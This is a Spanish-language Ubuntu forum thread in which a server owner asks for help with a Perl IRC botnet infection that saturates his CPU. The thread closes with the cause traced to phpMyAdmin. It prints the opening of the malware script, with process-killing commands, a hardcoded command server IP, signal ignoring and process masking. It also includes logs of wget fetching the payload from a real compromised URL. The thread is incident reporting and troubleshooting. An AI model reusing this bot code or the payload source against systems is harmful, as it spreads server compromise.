Hola a todos.
No soy ningún experto en Linux pero bueno, he hecho mis pinitos. Tengo un servidor para alojar 8 páginas web, servicio de backup cruzado e histórico, descargas, etc.
Ahora lo tengo montado en Luci 10.04 64bits pero antes lo tenía en 8.04 (creo recordar), sobre un Q6600 (4 nucleos).
El problema es que pasado unos meses de la reinstalación se van saturando los nucleos al 100% (primero uno y una hora despues otro etc) hasta colgarse el sistema. Investigo y resulta ser un perl que ejecuta un archivo temporal "a" en la carpeta /temp.
Ese archivo es un virus
#!/usr/bin/perl
# ----------------------------------------------------------- #
# subzero PerlBot v4.5 #
# Fuck Off All #
# ----------------------------------------------------------- #
system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
my $processo = '-';
my @titi = ("index.php?page=","main.php?page=");
my $goni = $titi[rand scalar @titi];
my $linas_max='3';
my $sleep='7';
my @adms=("daemon");
my @hostauth=("localhost");
my @canais=("#perl");
chop (my $nick = `uname`);
chop (my $ircname = `whoami`);
chop (my $realname = `uname -sr`);
$servidor='67.19.105.66' unless $servidor;
my $porta='8080';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
....................... y mucho mas
El código es bastante mas largo pero no lo pongo aquí para no extenderlo.
En el log se ve cuando baja el virus
rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-Fgav45': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 15:39:32-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'
0K .......... ..... 100% 48.6K=0.3s
2012-01-13 15:39:35 (48.6 KB/s) - `c.txt' saved [16241/16241]
sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 15:39:36-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'
0K .......... ..... 100% 53.7K=0.3s
2012-01-13 15:39:38 (53.7 KB/s) - `/tmp/p' saved [16241/16241]
--2012-01-13 15:39:38-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied
Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
[Fri Jan 13 21:42:17 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
[Fri Jan 13 21:42:18 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove `/tmp/gedit.curro.4044826546': Operation not permitted
rm: cannot remove `/tmp/gnome-system-monitor.curro.3986015880': Operation not permitted
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-WASEJH': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 21:42:38-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'
0K .......... ..... 100% 37.1K=0.4s
2012-01-13 21:42:42 (37.1 KB/s) - `c.txt' saved [16241/16241]
sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 21:42:44-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'
0K .......... ..... 100% 51.6K=0.3s
2012-01-13 21:42:45 (51.6 KB/s) - `/tmp/p' saved [16241/16241]
--2012-01-13 21:42:45-- http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied
Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
El proceso perl es este:
http://img841.imageshack.us/img841/8478/cuelgue1.jpg
Información de Proceso Comando - ID de Proceso 25408 Proceso padre /sbin/init Propietario www-data UCP 99.9 % Medida 22968 kB Tiempo de Ejecución 09:34:19 Nivel de prioridad (Nice) IO scheduling class IO priority Grupo Real www-data ID de grupo de Proceso 1539 Grupo www-data TTY Ninguna Started 00:42 Usuario Real www-data
y estos son los archivos que abre
http://img823.imageshack.us/img823/1407/cuelgue2.jpg
Para proceso - (PID 25408) Archivos abiertos Descriptor de Archivo Tipo Medida de archivo Inodo Trayectoria Directorio actual Directorio 4096 1835009 /tmp Directorio raíz Directorio 4096 2 / Código de programa Archivo regular 10416 1847282 /usr/bin/perl Biblioteca compartida Archivo regular 27032 2103551 /usr/lib/perl/5.10.1/auto/Socket/Socket.so Biblioteca compartida Archivo regular 22904 2103779 /usr/lib/perl/5.10.1/auto/IO/IO.so Biblioteca compartida Archivo regular 43296 1972107 /lib/libcrypt-2.11.1.so Biblioteca compartida Archivo regular 1572232 1966281 /lib/libc-2.11.1.so Biblioteca compartida Archivo regular 135745 1966364 /lib/libpthread-2.11.1.so Biblioteca compartida Archivo regular 534832 1972135 /lib/libm-2.11.1.so Biblioteca compartida Archivo regular 14696 1972139 /lib/libdl-2.11.1.so Biblioteca compartida Archivo regular 1487368 1718887 /usr/lib/libperl.so.5.10.1 Biblioteca compartida Archivo regular 136936 1968483 /lib/ld-2.11.1.so 2w Archivo regular 1383104 662674 /var/log/apache2/error.log Conexiones de red abiertas Tipo Protocolo Descriptor de Archivo Detalles IPV4 TCP 3u 150.1.30.222:47320 -> 81.219.176.123:http-alt ESTABLISHED IPV4 TCP 11u 150.1.30.222:59877 -> 193.27.78.88:http-alt CLOSE_WAIT
Ya he pesado el Rkhunter y esta todo bien.
Datos curiosos:
- Me pasó lo mismo con el 8.0432bits y 10.04 64bits, la instalación fué completamente nueva, aunque las webs y base de datos se conservaron.
- la tarea se instala en cron cada segundo y el creador es www-data. He programado las tareas para que solo root pueda poner tareas nuevas y sin embargo sigue apareciendo la tarea pirata aunque la borre. cuando le digo de desactivarla no me deja porque el autor es www-data (curioso porque a pesar de tener que solo las pueden crear root me sale aunque no la puedo modificar) así que la borro.
En cuanto me vuelva a salir os pego aqui la tarea.
Todas mis sospechas es que viene por una vulnerabilidad del apache con el wordpress. Así que de momento he sacado todas las webs a otro servidor y solo he dejado una, para ir descartando que web es.
De todas formas acepto cualquier sugerencia.
SOLUCIONADO
Pues me puse a quitar servicios y haciendo pruebas descubrí que era una vulnerabilidad del phpadmin. Lo desactivé y listo, no se me ha vuelto a colgar el PC desde que lo he hecho (mas de dos meses), no tengo mas ataques, no tengo cuelgues, estabilidad absoluta.
Se ve que me atacaban la clave del phpadmin o alguna vulnerabilidad, hasta que entraban y desde ahí me atacaban las webs.
Pues como recomendación por tanto no usar el phpadmin o tenerlo desactivado hasta que lo necesites.
Ubuntu 8.10
Gracias por comentarlo,
Gracias por comentarlo, miraré a ver sobre el tema de phpadmin...
¿¿Te refieres a phpmyadmin??
Gracias, si eso muevo el enlace de var/www a otro lugar para que no se pueda usar, y cuando haga falta, como dices, lo muevo a su sitio, hago lo que necesite y lo vuelvo a cambiar.
Un saludo y gracias.
Si entro en Window$ estoy más tenso que en el bautizo de un gremlin.
Linux user: 545.017
Por favor, si solucionas el hilo añade [Solucionado] al título.
phpmyadmin
Si, perdona, se me fué la pinza, phpmyadmin.
Ubuntu 8.10
He actualizado a una versión
He actualizado a una versión más resiente, según sus creadores hay un fallo importante de seguridad en las versiones 3.3.0 a la versión 3.4.3.2 que permite obtener capacidades root.
De momento he actualizado phpmyadmin porque estaba por debajo de la 3.3.0 :S Gracias por avisar, no se me hubiese pasado por la cabeza pensar que estando la distribución actualizada tuviese una versión con vulnerabilidades...
Gracias de nuevo.
Si entro en Window$ estoy más tenso que en el bautizo de un gremlin.
Linux user: 545.017
Por favor, si solucionas el hilo añade [Solucionado] al título.